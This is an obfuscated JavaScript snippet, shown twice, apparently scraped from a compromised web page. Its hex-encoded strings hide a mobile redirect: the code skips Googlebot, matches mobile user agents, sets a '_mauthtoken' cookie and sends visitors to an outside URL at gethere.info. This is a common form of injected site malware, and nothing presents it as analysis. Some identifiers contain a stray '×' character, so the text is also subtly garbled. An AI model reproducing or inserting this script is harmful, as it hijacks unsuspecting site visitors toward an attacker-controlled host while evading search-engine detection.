var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}